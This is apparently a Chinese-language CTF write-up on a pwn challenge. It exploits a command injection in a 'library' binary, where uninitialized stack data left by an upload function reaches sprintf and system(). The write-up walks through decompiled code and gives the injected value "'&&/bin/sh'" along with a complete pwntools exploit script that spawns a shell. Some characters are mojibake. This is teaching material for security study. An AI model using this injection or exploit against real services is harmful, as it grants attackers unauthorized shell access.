0x00 前言

這種命令行注入在pwn中出現(xiàn)的比較少，所以記錄分享一下。

0x01 命令行注入介紹

熟悉web安全的話就知道，如果對(duì)特殊字符過(guò)濾不當(dāng)，會(huì)引發(fā)sql注入或者xss等安全漏洞。其中，命令行注入較為嚴(yán)重，因?yàn)榭梢灾苯幽玫铰┒闯绦虍?dāng)前權(quán)限的OSshell。

然而，命令行注入不僅在web中會(huì)出現(xiàn)，在C語(yǔ)言程序中，也會(huì)出現(xiàn)命令行注入的漏洞。比方說(shuō)這道pwn題，就是調(diào)用system時(shí)，沒(méi)有對(duì)輸入數(shù)據(jù)進(jìn)行\(zhòng)0截?cái)嘁约皩?duì)特殊字符處理不當(dāng)而導(dǎo)致的。

命令行注入相對(duì)于其他二進(jìn)制漏洞相比利用比較簡(jiǎn)單，比方說(shuō)這道題，舉個(gè)例子：

sprintf(&s, "du -sh lib/'%s'", v6);
system(&s);

其中設(shè)計(jì)初衷，v6應(yīng)當(dāng)是一個(gè)合法的文件名。但是如果攻擊者惡意操控v6，比方說(shuō)，讓v6為：'&&/bin/sh'
進(jìn)行sprintf拼接后，system所執(zhí)行的命令為：

du -sh lib/''&&/bin/sh''

這里有兩個(gè)linux命令行的知識(shí)：

&&，這是拼接兩個(gè)命令，如果我們執(zhí)行 command1&&command2，那么等價(jià)于先執(zhí)行command1在執(zhí)行command2。其中命令跟&&之間不必加空格。

在命令后不加空格的''（兩個(gè)單引號(hào)）會(huì)被忽略，比如ls''等價(jià)于ls，/bin/sh''等價(jià)于/bin/sh，du -sh lib/''等價(jià)于du -sh lib/（即，實(shí)際傳進(jìn)去的參數(shù)是lib/不是lib/''）

所以，執(zhí)行上面的命令，相當(dāng)于先執(zhí)行了

du -sh lib/

再執(zhí)行

/bin/sh

所以，可以getshell。

0x02 題目

題目所給的是一個(gè)library的服務(wù)，可以上傳book，查看books，清除books。其中，book存放在lib/文件夾中。

0x03 漏洞點(diǎn)

char *list_books()
{
 FILE *v0; // eax
 char *result; // eax
 char s; // [esp+4h] [ebp-C14h]
 char ptr; // [esp+804h] [ebp-414h]
 char *v4; // [esp+C04h] [ebp-14h]
 FILE *stream; // [esp+C08h] [ebp-10h]
 char *v6; // [esp+C0Ch] [ebp-Ch]
 v0 = popen("ls lib/", "r");
 stream = v0;
 result = (char *)fread(&ptr, 1u, 0x400u, v0);
 v4 = result;
 if ( result )
 {
 v6 = strtok(&ptr, delims);
 result = (char *)send("Book list:\nSize\tE-book\n");
 while ( v6 )
 {
 sprintf(&s, "du -sh lib/'%s'", v6);
 //很明顯，這里存在可能的命令行注入
 system(&s);
 fflush(stdout);
 result = strtok(0, delims);
 v6 = result;
 }
 }
 return result;

其中l(wèi)ist_books代碼如上，v6來(lái)自fread從popen中的返回結(jié)果。他本來(lái)想做的是輸出每個(gè)文件的大小，但是fread后沒(méi)有用\0截?cái)?。所以調(diào)用strtok時(shí)，可能會(huì)讀到fread后面的垃圾數(shù)據(jù)（當(dāng)然如果可以操控的話就不是垃圾數(shù)據(jù)了）

sprintf的棧溢出會(huì)比較難利用，因?yàn)?s比較大，有0x800，而v6是從&ptr里面strtok出來(lái)的，而&ptr更小，只有0x400。所以應(yīng)該沒(méi)法很好的利用。

0x04 操控垃圾數(shù)據(jù)

那么，我們?cè)趺慈ゲ倏?ptr中的垃圾數(shù)據(jù)呢？這個(gè)時(shí)候看看另外一個(gè)函數(shù)

int upload_book()
{
 char *v1; // eax
 int v2; // eax
 char buf[1024]; // [esp+Ch] [ebp-42Ch]
 char s[20]; // [esp+40Ch] [ebp-2Ch]
 FILE *stream; // [esp+420h] [ebp-18h]
 char *dest; // [esp+424h] [ebp-14h]
 size_t v7; // [esp+428h] [ebp-10h]
 int v8; // [esp+42Ch] [ebp-Ch]
 if ( book_counter > 10 )
 return send("too many books\n");
 send("Book filename: ");
 v8 = __isoc99_scanf("%20s", s);
 if ( v8 != 1 )
 return send("Wrong title format\n");
 v7 = strlen(s);
 if ( strcmp(&s[v7 - 3], ".bk") )
 return send("The name needs to end with '.bk'\n");
 send("e-book contents: \n");
 read(0, buf, 0x400u);
 if ( *(_DWORD *)buf != 'BBBB' )
 return send("Not an e-book\naborting...\n");
 v1 = (char *)malloc(0x18u);
 dest = v1;
 *(_DWORD *)v1 = 0x2F62696C;
 v1[4] = 0;
 strcat(dest, s);
 stream = fopen(dest, "w");
 if ( !stream )
 return send("Bad book filename\n");
 v2 = book_counter++;
 books[v2] = dest;
 fwrite(buf, 1u, 0x400u, stream);
 return fclose(stream);
}

其中，這在棧中也會(huì)分配0x400個(gè)字節(jié)，并且我們可以寫(xiě)入。

并且，調(diào)用完這個(gè)函數(shù)之后，清除?？臻g時(shí)，只是簡(jiǎn)單地add esp,xxx，并不會(huì)清空其中數(shù)據(jù)。然后，再調(diào)用存在命令行注入的函數(shù)并分配?？臻g時(shí)，也只是單純地sub esp,xxx，也不會(huì)清空數(shù)據(jù)。在C語(yǔ)言中，如果此時(shí)對(duì)不賦值的局部變量直接訪問(wèn)的話，是UB行為。但是，從二進(jìn)制安全的角度看的話，便是可利用的點(diǎn)了。其中這道題，本身就是一個(gè)局部字符串讀取后未截?cái)喽斐傻腢B，然而我們便可以利用這個(gè)。

那么來(lái)試試：

很明顯，BBBB123456789123456789123456789123456789AAAA的后面89123456789AAAA被拼接到du -sh lib/'%s'中了

動(dòng)態(tài)調(diào)試看一下的話

第一次在system停下

第二次在system停下

所以很明顯，只要把89123456789AAAA改成

'&&/bin/sh'\x00

就可以getshell了。如前面所說(shuō)。

其中，\x00是我們自己手動(dòng)截?cái)?，不然strtok還會(huì)繼續(xù)往后讀。

所以最后exp

#BBBB1234567891234567891234567'&&/bin/sh'
g_local = True
 
from pwn import *
 
if g_local:
 sh=process("./library")
else:
 sh=remote("xxxx",1234)
 
 
def upload_book(filename, content):
 filename += ".bk"
 sh.send("1\n")
 sh.recvuntil("Book filename: ")
 print filename
 sh.send(filename + "\n")
 sh.recvuntil("e-book contents: \n")
 sh.send(content)
 sh.recvuntil("Enter command: ")
 
def list_books_and_shell():
 sh.send("2\n")
 sh.interactive()
 
upload_book("1", "BBBB1234567891234567891234567\'&&/bin/sh\'\x00")
list_books_and_shell()

0x05 后言

還有一點(diǎn)要注意，pwndbg好像會(huì)默認(rèn)在fork時(shí)跟子進(jìn)程，所以要在~/.gdbinit的最后面(加載pwndbg之后)加上set follow-fork-mode parent。并且，&&與命令之間不能加空格。因?yàn)樗鹲trtok是通過(guò)空格和換行分?jǐn)嘧址?，加了空格我們的payload就會(huì)被strtok分割開(kāi)。

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了，希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，如果有疑問(wèn)大家可以留言交流，謝謝大家對(duì)我們的支持。